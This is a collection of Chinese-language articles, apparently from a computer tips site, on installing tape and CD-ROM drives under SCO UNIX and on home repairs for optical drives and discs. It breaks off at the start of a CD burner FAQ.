    (一)Wangtek类型的磁带机的安装方法Wangtek磁带机有三洋系列和Wangtek 5125EQ/51 50EQ及5152PK/5150PK。由于厂商不同,每一种产品设置也不同。现分别介绍三洋磁带机和W angtek 5152PK/5150PK的安装方法。

    1.三洋磁带机的安装方法

    三洋磁带有60MB和150MB,三洋磁带机的磁带卡上有开关和跳线,在安装前根据磁带的容 量来设置开关跳线,如为60MB,则开关和跳线设置为60MB,如150MB,同样设置为150MB,它遵守 的守则为Lasertron TC-833设定安装守则,它设定值为:

    参数 内定值 开关/跳线

    I/O接口地址 370H SW1(DIP开关1至9)

    磁带机容量 ON(60MB) SW1(DIP开关10)

    外接式磁带机容量 150MB JP3、JP4和JP5

    DMA通道 1 JP7和JP8

    中断要求 IRQ3 JP9

    从上可知:

    ①I/O地址由SW1的DIP1至9决定,地址为16进制,计算地址方法前两位为一组,中间四位为 一组,后四位为一组,ON为0,OFF为1,370H二进制表示为1101110000。

    ②磁带机容量开关根据磁带容量决定,如为60MB,则SW1的DIP开关10为ON,同时JP3、JP4 、JP5必须用跳线将1、2相连;如为150MB,则SW1的DIP开关10为OFF,同时JP3、JP4、JP54用跳 线将2、3相连。

    ③DMA通道由JP7及JP8决定,JP7和JP8要一致,如同时为1,则表示IRQ为1;同时为2,表示I RQ为2;为3,表示IRQ为3,UNIX/XENIX系统只选1或3。

    ④中断向量由JP9决定,默认为3。只与串口COM2是一致的,如COM2已安装了用户卡等串口 设备,则磁带机的磁带卡开关跳线一定要改,为避免冲突,一般改为5。因为IRQ5为辅并行口用 ,一般不用此并行口。

    现将在UNIX系统下安装步骤介绍如下:

    (1)引导系统进入维护状态,键入命令"#mkdev tape",并回车。

    (2)屏幕显示:

The Driver Configuration Program

1.Install a Tape Driver

2.Remove a Tape Driver

3.Change default Tape Driver

Select an option or enter q to quit:

键入1,并回车。

屏幕显示:

1.Install Cartridge Tape Driver

2.Install Mini-Cartridge Tape Driver

3.Install Qic-40/Qic-80 Tape Driver

4.Install SCSI Tape Driver

Select an option or enter q to quit:

键入1,并回车:

屏幕显示:

QIC Cartridge Tape Configuration

1.Display current tape parameters

2.Modify current tape parameters

3.Select previous tape parameters

4.Select default tape parameters

Enter your choice or enter q to quit:

键入2,并回车屏幕显示:

Tape Parameters Values Comment

1.Controller Type 0 1=archive,3=wangtek,4=emerald

5=mountain,6=tecmar,7=everex/tandberg

2.DMA Channel 0 1 or 3

3.Interrupt Vertor 0 logical vector number

4.Base Address 0 I/O addresses start here

Zero values input Auto-configuration

Enter a parameter to modify or q to return to the main menu:

根据磁带机的磁带卡的参数进行修改,可依次修改第1、2、3、4项。

接着屏幕显示:

Enter the new value or＜Return＞to use the existing values:根据卡的参数进行修 改,键入正确的值。

四个默认参数的正确值分别为3、1、5、0370H。

四个参数都正确,按"q"退出,接着显示:

Updating system configurationSystem files have been successfully updated.De fault special device have been created with the following links.

……Do you wish to change this to the current cartridge tape drive?(y/n)键入 y,并回车,显示:

In/etc/default/boot No current boot string

Enter new string,"rm"to remove string,or enter q to leave current sting asi s:键入q,并回车,显示原来刚开始的信息,键入q,并回车,接着显示:

You must creat a new kernel to effect the change you specified.

Do you wish to creat a new kernel now?(y/n)

键入y,并回车,下面提示新建的内核是否作为默认引导内核,键入y;下面提示设置内核环 境,键入y,重新启动,如配置无显示错误,再用TAR命令执行无误,则至此安装成功。如有错,则 查看卡参数是否与安装时输入的参数一致,卡是否插紧,电缆线是否接的对,电源是否接上,再 看是否与系统其它设备发生冲突,再用"#mkdev tape"命令重装直至无误。

2.Wangtek磁带机的安装方法

比较流行的Wangtek磁带机有5125PK/5150PK、5125EQ/5150EQ。5125表示125MB,5150表 示150MB。需要说明一点,5125PK/5150PK磁带机安装在SCO XENIX系统I/O地址必须为338H,I RQ为5,DMA为1。因此在安装前先设置卡的跳线和开关,IRQ原为3,现将跳线插在5上。

5125PK/5150PK和5125EQ/5150EQ虽都是Wangtek系列,但地址确认也有不同。

①5125PK/5150PK的地址开关为:

Address bit A1 A2 A3 A4 A5 A6 A7 A8 PS

SW Position 1 2 3 4 5 6 7 8 9 10

Desired

Address

280H 0 0 0 0 0 0 1 0 NA 0

288H 0 0 1 0 0 0 1 0 NA 0

300H 0 0 0 0 0 0 0 1 NA 0

338H 0 0 1 1 1 0 0 1 NA 0

(表格中的0表示为ON,1表示为OFF,NA表示为1,地址计算方法为SW1-1为低位,SW1-9为高 位,正确的地址顺序为SW1-9、SW1-8、…、SW1-1、SW1-9和SW1-8为一组;SW1-7～SW1-4为一 组;SW1-3～SW1-1为一组。*表示为默认设置地址,地址在安装前要改为338H)。

②5125EQ/5150EQ的地址开关为:

Address bit A1 A2 A3 A4 A5 A6 A7 A8 A9

SW Position 1 2 3 4 5 6 7 8 9 10

Desired

Address

280H 0 0 0 0 0 0 1 0 1 NA

288H 0 0 1 0 0 0 1 0 1 NA

300H 0 0 0 0 0 0 0 1 1 NA

338H 0 0 1 1 1 0 0 1 1 NA

(表格中的0表示为ON,1表示为OFF,NA表示为1,地址计算方法为SW1-1为低位,SW1-9为高 位,正确的地址顺序为SW1-9、SW1-8、…、SW1-1,SW1-9和SW1-8为一组;SW1-7～SW1-4为一组 ;SW1-3～SW1-1为一组。*表示为默认设置地址。

5125PK/5150PK与5125EQ/5150EQ的SW1-9和SW1-10有点不同。

Wangtek系统磁带机的地址确认方法与三洋不同,三洋磁带机的SW1-1为高位,而Wangtek 为低位,但安装方法是一样的,在安装时除地址可能不一致外,其余都一样,这里不作介绍。

    (二)Tandberg磁带机的安装方法Tandberg磁带机安装方法与上不同。Tandberg的接口为 SCSI接口,Tandberg磁带机接在SCSI电缆上,系统开机时显示SCSI的各种设备的host adapte r、ID号、LUN号,系统已检测到此设备。

    Tandberg安装方法有如下两种方法:

    1.方法1:设置默认磁带机设备

    在安装磁带机时有一项改变磁带机设备,将磁带机设备设置为SCSI磁带机即可。方法如下:

    (1)在超级用户下,键入命令"#mkdev tape",并回车。

    (2)屏幕显示:

Tape Driver Configuation Program

1.Install a Tape Driver

2.Remove a Tape Driver

3.Change default Tape Driver

Select an option or enter q to quit:

键入3,并回车,屏幕显示:

1.Cartridge Tape Drive

2.Mini-Cartridge Tape Drive

3.QIC-40 or qic-80 Tape Drive

4.SCSI Tape Drive

Please select which tape drive you would like to have linked to default dev iceor enter q to return to the main menu:

键入4,并回车,屏幕显示:

Default SCSI Tape Drive Updated Menu

1.SCSI Tape Drive(Cartridge,Exabyte,9-Track,DAT)

2.Compaq SCSI Tape Drive

Please select which tape drive you would link to have linked to default dev ice or enter q to return to the main menu;

键入1,并回车,屏幕显示:

Default special device have been created with the following links:

/dev/xcto linked to /dev/xStp0/dev/rct0 linked to/dev/rStp0 and /dev/rmt/ob …… Enter new string,"rm"to remove string, or enter to leave current stringa s is:

键入q,并回车,屏幕回到初始信息,键入q,并回车,回到超级用户下,至此就可以用TAR命 令读/写磁带。

2.方法2,具体步骤如下:

(1)在超级用户下,键入命令"#mkdev tape",并回车。

(2)屏幕显示:

Tape Driver Configuration Program

1.Install a Tape Driver

2.Remove a Tape Driver

3.Change default Tape Driver

Select a option or enter q to quit:

1.Install Cartridge Tape Driver

2.Install Mini-Cartridge Tape Driver

3.Install Qic-40/Qic-80 Tape Driver

4.Install SCSI Tape Driver

Select an option or enter q to return to main menu:

键入4,并回车,屏幕显示:

SCSI Tape Drive Installation Menu:

SCSI Tape Drive Installation Menu:

1.Install SCSI Cartridge Tape Driver

2.Install Exabyte Tape Driver

3.Install SCSI 9-Track Tape Driver

4.Install SCSI DAT Tape Driver

5.Install Compaq SCSI Tape Driver

Select an option or enter q to return to main menu:

键入1,并回车,屏幕显示:

The SCSI Cartridge Tape Drive must be configured before use:

Do you wish to configured the SCSI Cartridge tape Drive now?(y/n):

键入y,并回车,屏幕显示:

Enter the prefix of the SCSI host adapter that supports this device or pres s＜Return＞for the default:"arad"Enter h for a list of host adadpter or enter q t o quit:

回车取默认值,屏幕显示:

Which"arad"SCSI host adapter supports this device?

Select 0～2,or enter q to quit:

键入0,并回车,屏幕显示:

What is the Target ID for this device?

Select 0～7,or h for help,or q to quit:

根据开机时显示SCSI各种设备时显示的ID号题入,开机时显示TANDBERG磁带机ID号为2, 故键入2,并回车,屏幕显示:

Host Adapter Type Device Adapter Number ID LUN

arad Stp 0 2 0

Update SCSI Configuration?(y/n)

键入y,并回车,屏幕显示:

Default special device have been created with the following links:

/dev/xct0 linked to /dev/xStp0

/dev/rct0 linked to/dev/rStp0 and/dev/rmt/0b…Enter new string,"rm"to remov e string,or enter q to leave current string as is:键入q,并回车,显示原来刚开始的 信息,键入q,并回车,接着显示:

    You must creat a new kernel to effect the change you specified.Do you wisht o creat a new kernel now?(y/n)键入y并回车,下面提示新建的内核是否作为　默认引导内 核,键入y,下面提示设置内核环境,键入y,重新启动,如配置无显示错误,再用TAR命令执行无 误,至此安装成功。如有错,则查看卡参数是否与安装时输入的参数一致,卡是否插紧,电缆线 是否接的对,电源是否接上,再看是否与系统其它设备发生冲突,再用"#mkdev tape"命令直至 无误。

二、光驱的安装方法
    光驱是光盘存储器的简称,英文叫CD-ROM。CD-ROM是多媒体PC机的必备部件,它可以方便 地播放存储在其中的图像,CD-ROM盘容量相当大,当然CD-ROM并不仅仅用于DOS系统和Window s系统,它同样可以适用于UNIX系统,只要在UNIX系统下开发的应用系统,存放在CD-ROM盘上符 合UNIX系统允许的格式。CD-ROM盘与磁盘和软盘相比具有如下特点:

    (1)CD-ROM盘一般是单面只读光盘,因为制造一张双面只读光盘的成本比两张单面只读光 盘要贵得多,所以目前市场上CD-ROM盘为单面5寸光盘。

    (2)CD-ROM是大容量光盘存储器,CD-ROM可提供600MB以上的存储空间,现在市场上有650 MB、1.3GB、2.6GB等光盘,目前使用较多的为650MB光盘。CD-ROM读写时间比磁盘长,比软盘 要快得多,根据读写速度,市场上出现了二倍速、四倍速、六倍速、八倍速、十倍速、十二倍 速光驱。CD-ROM驱动器采用的是SCSI接口,要接在SCSI电缆上,SCSI电缆上可以接很多适用与 SCSI接口的设备。

    现将光驱的安装方法介绍如下:

    (1)引导系统进入维护状态,键入命令"#mkdev cdrom",并回车

    (2)屏幕显示:

CD-ROM Configuration Program

1.Install a CD-ROM Drive

2.Remove a CD-ROM Drive

3.Install a CD-ROM Drive

4.Remove a CD-ROM Drive

Select an option or enter q to quit:

键入1,并回车,屏幕显示:

The CD-ROM Drive must be Configured before use,Do you wish to configure the CD-ROM Drive now?(y/n)键入y,并回车,屏幕显示:

Enter the prefix of the SCSI host adapter that supports thisdevice or press ＜Return＞for the default:"arad"Enter h for a list of host adapters or enter q to quit:

回车默认的arad,arad为此机器的SCSI host adaptor的类型,不同的机器具有不同的类 型,如HP LC机为arad,而HP LH机、HP LS机为alad,键入h可知很多的类型,屏幕显示:

Which"arad"SCSI host adapter supports this device?

Select 0～2,or enter q to quit:

键入0,并回车,屏幕显示:

What is the Target ID for this device?

Select 0～7,or h for help or q to quit:

键入5,并回车,屏幕显示:

What is the LUN of this device?

Press＜Return＞ to use the default:0Select 0～7,or h for help or q to quit:

键入0,并回车(注:键入的0、5、0三个数字为开机时系统默认显示的数字),屏幕显示参 数表:

Host AdapterType Device Adapter Number ID LUN

arad Stp 0 2 0

Update SCSI Configuration?(y/n)键入y,并回车,屏幕显示:

……The SCSI Configuration file has been updated. Do you want to configurat ion a CD-ROM/Tape installation device?(y/n)键入y,并回车,屏幕显示:

Configuring cdt driver..Updeating system configuration..System files have b een successfully updated.CD-ROM device unit 0(file CD-ROM device in /etc/conf/c f.d/mscsi)is configured as the CD-ROM/Tape installation device.Do you want to a dd/configure the high-sierra file system＞(y/n)键入y,并回车,屏幕显示:

High Sierra/ISO 9660 filesystem configuration program

1.Add High Sierra/ISO9660 filesystem to system configuration

2.Remove High Sierra/ISO 9660 filesystem from system configuration

Select an option or enter q to quit:

键入1,并回车,屏幕显示:

System configuration files have been successfully modified CD-ROM configura tion program.……Enter new string,"rm"to remove string,or enter q to leave curr ent string as is:

键入q,并回车,显示原来刚开始的信息,键入q,并回车,接着显示:

You must creat a new kernel to effect the change you specified.Do you wisht o creat a new kernel now?(y/n)键入y,并回车,下面提示新建的内核是否作为默认引导内 核,键入y,下面提示设置内核环境,键入y,重新启动即可。

返回


SCOUNIX如何使用IDE光驱

《一键清理系统垃圾》

SCOUNIX如何使用IDE光驱

---- 在SCO UNIX 下 使 用SCSI 光 驱 是 很 容 易 的 事 情， 但 要 使 用IDE 光 驱， 在 没 有 安 装SCO 公
司 的"Boot SLS for Unix/ODT" 补 丁 盘 之 前 是 行 不 通 的， 本 人 以 前 多 次 尝 试， 均 告 失 败。
本 文 将 就 安 装 了 该" 补 丁 盘" 之 后， 如 何 配 置 使 用IDE 光 驱 问 题 进 行 讨 论。
---- SCO 公 司 提 供 的"Boot SLS" 主 要 包 括 以 下 内 容：
对 系 统 引 导 的 支 持（ 更 换 了/boot，/link，/bootos 等 文 件）

对LBA 方 式 下 的 大 硬 盘 的 支 持（ 更 新 了wd 驱 动 程 序）

对IDE 光 驱 的 支 持（ 在wd 驱 动 程 序 中 增 加 了wdatapi.c 模 块）

增 加 或 改 进 了 一 些 硬 件 设 备 驱 动 程 序
一、IDE 光 驱 的 参 数 问 题
---- 在 对IDE 光 驱 的 配 置 过 程 中， 需 将IDE 光 驱 作 为 一 种SCSI 设 备 来 处 理， 为 其 提 供SCSI
设 备 所 特 有 的 三 个 参 数： 适 配 器 号，ID 号，LUN（ 逻 辑 通 道 号）。
---- 现 在 的 微 机 中 一 般 都 含 有 两 块IDE 适 配 器， 每 块IDE 适 配 器 可 以 连 接 两 个 IDE 设 备，
这 样 共 可 以 连 接4 个IDE 设 备。 除 了 第 一 块IDE 适 配 器 的 第 一 个IDE 设 备 接 口（ 该 接 口 一 般
总 是 接 硬 盘） 之 外， 你 可 以 将IDE 光 驱 接 入 余 下 的3 个 接 口 中 的 任 一 个。 对 每 个 实 际 连 接
的IDE 光 驱 来 说， 都 可 以 确 定 上 述 三 个 参 数， 具 体 方 法 如 下：
第 一 块IDE 适 配 器 的 适 配 器 号 规 定 为0；

第 二 块IDE 适 配 器 的 适 配 器 号 规 定 为1；

每 块IDE 适 配 器 上 的 第 一 个IDE 设 备，ID 号 规 定 为0；

每 块IDE 适 配 器 上 的 第 二 个IDE 设 备，ID 号 规 定 为1；

LUN 总 是 规 定 为0。
---- 例 如， 你 的IDE 光 驱 安 装 在 第 二 块IDE 适 配 器 上 的 第 一 个IDE 设 备 接 口 上， 则 该IDE 光
驱 的 适 配 器 号，ID 号，LUN 分 别 是：1，0，0。 下 面 将 以 此 光 驱 为 例， 说 明 如 何 配 置IDE 光 驱。
二、 配 置IDE 光 驱
---- 进 入root 帐 户 后， 执 行 以 下 命 令：
# mkdev cdrom

屏幕显示：（< RET >表示回车）

CD-ROM Configuration Program

1. Install a CD-ROM Drive
2. Remove a CD-ROM Drive
3. Install a CD-ROM/TAPE Driver
4. Remove a CD-ROM/TAPE Driver

Select an option or enter q to quit: 1< RET >
（选择 1表示安装一个CD-ROM驱动器）

The CD-ROM Driver must be configured before use.
Do you wish to configure the CD-ROM Driver now?(y/n)
y< RET >
（选择 y表示"现在配置CD-ROM驱动器"）

Enter the prefix of the SCSI host adapter that
supports this devices
or press < Return > for the default:'wd'
Enter h for a list of host adapters or enter
q to quit:< RET >
（按回车，表示主适配器是wd类型）

Which 'wd' SCSI host adapter supports this devices?
Select 0-2 ,or enter q to quit: 1< RET >
（选择 1表示该ＩＤＥ光驱安装在第二块适配器上）
What is the Target ID for this devices?
Select 0-7, or h for help ,or q to quit: 0< RET >
（选择0表示该ＩＤＥ光驱安装在适配器的第一个设备接口上）

What is the LUN of this devices? Press
< Return > to use the default:0
Select 0-7, or h for help, or q to quit:< RET >
（按回车，表示ＬＵＮ为0）

You are about to add the following SCSI device:

Host
Adapter "Adapter"
Type Device Number "ID" "LUN"
-----------------------------------------------
wd Srom 1 0 0

Update SCSI Configureation ?(y/n) y< RET >
（选择y表示更新ＳＣＳＩ配置）

Do you want to configure a CD-ROM/TAPE
installation device?(y/n) n< RET >

Do you want to add/configure the high-sierra
file system?(y/n) y< RET >

High Sierra/ISO9660 filesystem configuration Program
1.Add High Sierra/ISO9660 filesystem to
system configuration
2.Remove High Sierra/ISO9660 filesystem
to system configuration
Select an option or enter q to quit: 1< RET >
（选择1表示增加ISO9660文件系统到系统配置中）

之后，回到第一屏:

CD-ROM Configuration Program

1. Install a CD-ROM Drive
2. Remove a CD-ROM Drive
3. Install a CD-ROM/TAPE Driver
4. Remove a CD-ROM/TAPE Driver

Select an option or enter q to quit: q< RET >

---- 选q 退 出， 系 统 提 示 是 否 创 建 新 的 内 核， 这 时 连 选 三 个y 即 可。 之 后， 重 新 启 动 系 统，
准 备 做 第 三 步。
三、 安 装CDROM 上 的ISO9660 文 件 系 统
---- 目 前 市 面 上 见 到 的CDROM 盘 片 一 般 都 是ISO9660 格 式 的，SCO UNIX 支 持 这 种 格 式。 要
将CDROM 上 的 文 件 系 统 安 装 到 系 统 中， 需 执 行 以 下 命 令：
# mount -f HS /dev/cd0 /mnt

---- 其 中 -f HS 指 定 光 盘 是ISO9660 格 式 的，/dev/cd0 是CDROM 的 设 备 名， 是 由 第 二 步"
配 置IDE 光 驱" 创 建 的（ 注 意， 如 果 你 安 装 了 两 个 光 驱， 它 们 的 设 备 名 将 分 别 是/dev/cd0
和/dev/cd1），/mnt 是 要 安 装 的 空 目 录。 之 后， 就 可 以 像 使 用 其 他 文 件 一 样， 使 用CDROM 上
的 文 件 了。
四、 卸 载CDROM 文 件 系 统
---- 如 果 你 不 想 使 用CDROM 中 的 光 盘 了， 可 执 行 以 下 命 令， 卸 载CDROM 文 件 系 统：
# umount /mnt

---- 然 后 就 可 以 取 出CDROM 盘 片。

返回


调节光头电流延长光驱寿命

《一键清理系统垃圾》

调节光头电流延长光驱寿命

    光驱对大家来说，已经是一个非常熟悉的电脑部件了。对于它的报道也非常多，比如读盘性能、速度、光头老化等。其中对于用户来说，光头老化问题是一个非常严重的问题。一般光驱在用一年半左右就开始逐渐老化，原来能读的光盘现在读不出或读好多遍才能读出，这就是光头老化所引起的。很多报刊介绍了防老化的方法，如不用盗版、正常弹出光盘、不用来看影碟等，但光头还是会一天天老化的。于是在使用中又有了清洗光头，调电压等办法。当然到最后还是会有老化的一天，那时调电压也没有用了。我在这里介绍一个办法可以让光驱能再多用些时日。
    我有一个1994年买的光驱，用了两年就调了一次电压，一年后又调了一次，半年后又调了一次。在1998年时，光驱几乎到了极限了，好多碟都没法读。难道就这样完了？我又一次将光驱大卸八块，拿起万用表对光头电路做了一番检测和分析。发现调电阻就是让总电压的大部分集中到光头发射头上，这样电流增大了，光头功率也增大。可是将可调电阻调得太小有时会出现原来能读的光盘，现在倒读不出了的现象，据说这是因为光头聚焦不准的原因。
    光头电压调得很大时，可调电阻阻值为1K左右，就不能再调了。我顺着光头电路在主电路板查找。^38030201a^1中光头电路板上面的一个箭头指的就是电流输入可变电阻的地方。上面打圈的地方就是和输入点相连的接点。下面的一个箭头指的就是电流输出可调电阻的地方，下面的一个圈就是电流流回主电路板的接点。不过各种光驱的接线情况有所不同。根据接点可以找到电流在主电路板上的输出和输入点。再顺着电路板找电路上输出和输入位置有没有串接电阻，如果串了就可以并接一个电阻或用导线短路电阻的两端。只是有的光驱输出和输入点都是集成块，那就没办法了。^38030201b^2上面的箭头指的就是电流流出集成块的接点。电流流出集成块时还串接着一个阻值为100欧的电阻（如图2下面一个箭头指的电阻）。找来一根导线将电阻两端接在一起。随着阻值的减小，电流增大，再对可调电阻做适当调节，就可以读出光盘了，而且一用就是两年，这样我的光驱已经用了六年，不知以后还能用多长时间。
    以我的经验来看，有的光头电路上没有串电阻，那也只好作罢。不过有些光头上的可调电阻很小，只有十几欧或几百欧，而且厂家在光头电路留有并联电阻的焊点，只须用导线将它连上即可。光头本身可承受大电压，再加上大电流，功率加大，就可重新读出光盘了。此法对于主电路板上串着电阻的光驱效果十分明显。不过奉劝大家，此法只对调电压无用的光驱使用。


干扰引发的光驱读盘故障

《一键清理系统垃圾》

干扰引发的光驱读盘故障

一位好友刚买的光驱读盘能力突然大幅度下降，有时候连新购光盘中的数据也无法完整读取，无奈之下只好找到笔者帮忙。鉴于朋友的光驱是新买不久的（源兴48倍速），可以排除了光驱老化的可能性，我首先查看了该光驱的相关设置，一眼便看到DMA功能尚未被开启，马上将其选上，确认后重新启动计算机。当我满怀希望地放入光盘时，情况却没有丝毫好转，看来问题不仅是设置不当那么简单了。

    根据“替换法”的原则，我用自己运行良好的光驱换下了朋友的，这下可好，读盘性能更差了！不是光驱本身的问题？可是光驱的数据线及电源线都连接良好呀。正在百思不得其解之际，突然发现光驱的数据线和几根电源线被紧紧地绑在一起！难道故障就是由它们引起的？笔者赶紧将这几根线一一拔下，解开后理顺并重新接回原处后再次开机，搞定了！

    事后分析故障原因，朋友才想起来前一段时间因嫌机箱内走线较为混乱，把一堆连接线收到一起后用细绳子紧紧地绑到了一起，造成光驱数据线受到邻近电源线的干扰。开始时没有想到这一原因则是因为他整理连线后连续几天都没有使用光驱。

    所以想提醒各位朋友，切不可轻视机箱内的各条连线，机箱内的线尽量不要相互缠绕，否则就有可能造成线路间的相互干扰，从而引发一些本可以避免的故障。


高倍速光驱不再挑盘

《一键清理系统垃圾》

高倍速光驱不再挑盘

小弟我找到此方，实乃无心插柳柳成荫。 年初到电脑城找人装了一台机，回家后，立刻买了盘“金口哨”CD欣赏起来。但是没几个月，这个32倍速的光驱对这盘小口哨就起了戒心，每次放入之后都叽叽歪歪，一会儿就罢工了，一换别的碟子，就又高兴地出声了，好像我的“小口哨”怎么得罪了它似的。 因以前也修过碟机一类的电器，想小小光驱可能也是一回事吧!就对“鸡子”进行了解剖。折开光驱外壳后，放入CD一看，这小子把CD盘转了一会，发出一串哼哼声，就停下来不动了。再换别的碟子一看，哇!正常转动如飞。反复对比两张光碟，虽然从碟片厚度、大小看不出什么，但此碟在碟片夹装的区域没有保护的涂层，而是光板塑料，表面很是光滑，我想一定是摩擦力在作怪。 但如何解决摩擦力的问题呢?对碟片进行处理?可以，但局限性太大。应该对光驱夹装工具进行处理，于是便观赏起光驱的夹具来。原来高倍速光驱采取的是压片式的夹装方式，压片上没有任何电路联接部件，只由一个小圆盘塑料片放在支架上组成，待拆下支架后一看，原来接触碟片的位置也很光滑，问题可能就出在此。 那么如何使这块小区域的摩擦力增大呢?因此物太小，不好进行加工，弄不好还没有配件换。实在没招，就找了一个小刀片，在这突起一小圈的塑料夹位上，均匀地刻了二十几道浅痕，手一摸，感到有毛刺。装好支架一试，哈!这小子终于吹起了口哨。


光盘“杀手”的修理方法

《一键清理系统垃圾》

光盘“杀手”的修理方法

光盘是目前保存、传输数据最常用的介质之一，由于它体积小，便于携带，安全性强，兼容性好，读取设备广泛而备受广大计算机爱好者青睐。光盘由聚合塑料(聚碳酸脂）层、铝膜层和保护层三部分组成。许多人都知道光盘在使用中激光束是从塑料面入射的，塑料面上的划伤、指印和灰尘会影响数据的读取。因此，保护盘片不被划伤，正确规范的操作是延长光驱寿命的一个重要因素。

    近来有位朋友求助，抱怨他的光驱是光盘“杀手”，刚买的软件光盘没几天就出现了划痕，影响了光盘的使用，请我为之修理。观察他的光驱，该光驱为飞利浦40X，服役一年有余，已渐显老态。将光盘放入光驱，该光驱能顺利读盘，没有任何问题。按下出仓键，只听见一阵刺耳的声音，仓门打开，还可以看见光盘在旋转，原来故障在这里。观察光驱的托盘，发现该托盘上有四个支柱承载碟片，原来光驱在这四个支柱上有少许软性橡胶，通过此橡胶来承载碟片，可以减少光盘与托盘的摩擦，防止光盘被划伤；停止使用时，由于其摩擦作用，还可以使光盘的转速迅速降低直至停止。但由于使用时间过长，原有的橡胶已被磨掉，只剩下四个光秃秃的塑料支柱，光盘出仓时，由于其转速较高，在没有完全停止之前就与托盘接触，这四个塑料支柱就好像四把刀子一样，在光盘上留下深深的划痕，因此，又一张“茶杯垫”产生了！

    对于其他类型的光驱托盘，也会产生类似的情况，对碟片的表面都有不同程度的损伤。那么，采用何种方法来进行改善呢？对于托盘上有四个支柱的光驱，笔者采用的方法是：找一截自行车用的气门芯，截成大小合适相等的四段，将气门芯套在这四个塑料支柱上，以塑料支柱不露出为宜；也可直接将托盘上的四个支柱拆除，可以用手抠掉，也可用刀片将其刮平，将一截气门芯剪成约2~3厘米四段，用502胶水将其小心地粘在托盘边沿的凸台上，切记不可多用胶水，仅在气门芯与托盘的接触面上胶，与光盘的接触面千万不要沾上胶水，而且动作要快，因为502胶水属于快干型胶水，干后硬度较大，易损伤光盘。对于没有四个支柱的其他类型的光驱，也可以按上述方法处理，处理后，放上一张碟片，可观察到四个承载点仅与碟片最外缘的透明部分接触，因是软橡胶，即使碟片在托盘退出后仍旋转，也不用担心碟片会被擦花损伤。

    其实，不少光盘被划伤皆是不规范操作引起的，CD-ROM从一开始的单倍速发展到今天，光驱马达的转速也突破了每分钟一万转大关，这意味着在其上运转的光盘最高时速（外圈）可达225公里/小时。盘片在如此高速的转动中，若是光驱本身没有良好的控制系统及保护措施，很容易有意外发生。许多朋友不注意光驱的正确使用，要知道这些不好的习惯将直接影响光驱和光盘的使用寿命。如在光驱高速运行状态下强行退盘，那么很有可能出现上述故障，造成不必要的数据损失。因此，在高速光驱高速读取光盘数据时，尽量不用强行按“停止”键来退盘，一定要等到光驱面板上的指示灯停止显示时，方可按停止键来退盘。除非你想一年换一个新光驱，否则就要养成正确使用光驱的习惯。


光盘打滑故障分析与排除

《一键清理系统垃圾》

光盘打滑故障分析与排除

  光盘打滑现象是指当把光盘放入光驱后，可以听到激光头的移动和搜索的声音，接着听到摩擦声，最后光驱灯长亮不灭。造成这种情况的根本原因有两个，一是长期使用后，由于光驱的压盘机构没有产生足够的夹紧力，而导致盘片转动时打滑。二是使用了盗版劣质光盘，由于这些光盘制造时偷工减料，使得光盘的厚度比正版的光盘略薄些，与光驱的压盘机构摩擦不够。
    目前光驱的压盘结构主要有两种，一种是弹簧式压盘结构。当光盘放入光驱的托盘后，套在正对数据面的伞型轮上，然后光盘上方压盘上的塑料盘压住盘片，压盘后面的一个小弹簧伸长，使其夹紧盘片，随后伞型轮带动盘片稳转。光驱托盘退出时，压盘以弹簧所在位置为轴抬起，弹簧处于压缩状态，容易导致弹簧弹力减弱或向下弯曲，造成压盘没有足够的力量夹紧盘片，长期使用后导致光盘开始打滑。另一种是磁式压盘结构。当光盘放入光驱的托盘后，套在正对数据面的伞型轮上，然后光盘上方压盘上的塑料盘压住盘片，塑料盘下面有一块小磁铁，与通电伞型轮上的电磁铁产生吸引力，把盘片加紧，随后伞型轮带动盘片稳定旋转。光驱托盘退出时，由于断电伞型轮上电磁铁的磁力消失，压盘以塑料盘所在位置为轴抬起，被其上部的支撑架挡住而不能下落。由于长期使用后，上面的压盘和支撑架的间距过小，塑料盘不能同光盘同时旋转，高速旋转时发生摩擦，开始打滑。
    对于第一种情况，打开光驱观察压盘弹簧有无弯曲现象。若有弯曲现象，可用尖嘴钳子夹住弹簧，将弯曲的部分拽上来，这样使用中压盘抬起时，弯曲的弹簧会自动拉直。如果不行也可以将弹簧拆下来，手工拉长一些，即可解决。注意一定不要把弹簧拉断。对于第二种情况，打开光驱后，就可以发现在光盘托盘上横放着压盘和一个支撑架，压盘上有一个塑料盘，就是靠它运行式压住光盘，将支撑架适当地向下压一压，增大支撑架与压盘支撑面的间距，即可解决。
    最后提醒大家需要注意的是最好不要使用一些劣质的盗版光盘，因为使用劣质的盗版光盘也是直接造成光盘打滑的一个主要原因。


光盘读不出来的修理方法

《一键清理系统垃圾》

光盘读不出来的修理方法

相信大多数人都遇到过这样的光盘，放到光驱中，光驱发出“吱吱”的声音，有些文件和目录读不出来，或者整张光盘都无法读出来，甚至有时光驱发出像马达一样的声音使整个机器死机。

    可以发现，不同牌子的光驱对这样的盘的读盘能力不同，这说明读错误并不是由于刻录不好引起的。经过仔细的对比发现，有这种现象的光盘比正常光盘的要薄一些，放到光驱中不能被光驱上下夹紧。在高速旋转中打滑，转速不匀，定位不准了，导致读出错误，甚至发出马达般声响，使机器死机。那么怎么修理这种盘呢?其实很简单，只要把光盘中间光驱夹盘的位置垫厚。

    为了使光驱能够夹紧光盘，用白胶布剪成小块围着中间贴成一个环(两面均可)，经过这样处理的光盘又可以正常使用了，原先不能读出的东西现在均可读出，而且不再有“吱吱”的声音，使光盘又焕发了“青春”。当然如果是买正版的光盘就不会有这种现象了，因此，还是希望大家买正版光盘。

    还有一种更好、更简单、更安全的解决方法：只要到商店里买来VCD碟片保护膜，贴上一张就可一举两得，既能保护光盘，又可解决光盘因打滑而读不出数据来的问题。具体的使用方法是：在使用时，先不要将碟片保护膜的垫纸全部撕开，只需撕开一点。然后用剪刀将保护膜垫纸上下左右剪四刀，留下中间一个四方形的垫纸，然后贴上光盘就行。此四方形的垫纸，可以起到加厚光盘内圈的作用。在实际使用中还发现，留下此四方形垫纸，还有一个好处，就是因为此地方不粘手，使你可以用手拿住此地方，将保护膜贴上光盘时，能够一次成功，平滑美观，不会出现打皱。此外，这一块四方形的纸你也可以剪成圆形、六边形，各种各样，大点小点，随心所欲。


光盘刻录机常见故障问答集锦（一）

《一键清理系统垃圾》

光盘刻录机常见故障问答集锦（一）

《中国电脑教育报》李瑞

    随着价格的不断下跌，光盘刻录机已被越来越多的用户所采用。但在使用过程中，大家也经常会遇到一些问题。下面，我们就针对这些比较常见的问题进行解答，希望能对大家有所帮助。

    问题一，近日本人新买了一台40x的光盘刻录机，回家装好后发现计算机无法启动了，请问是何原因？

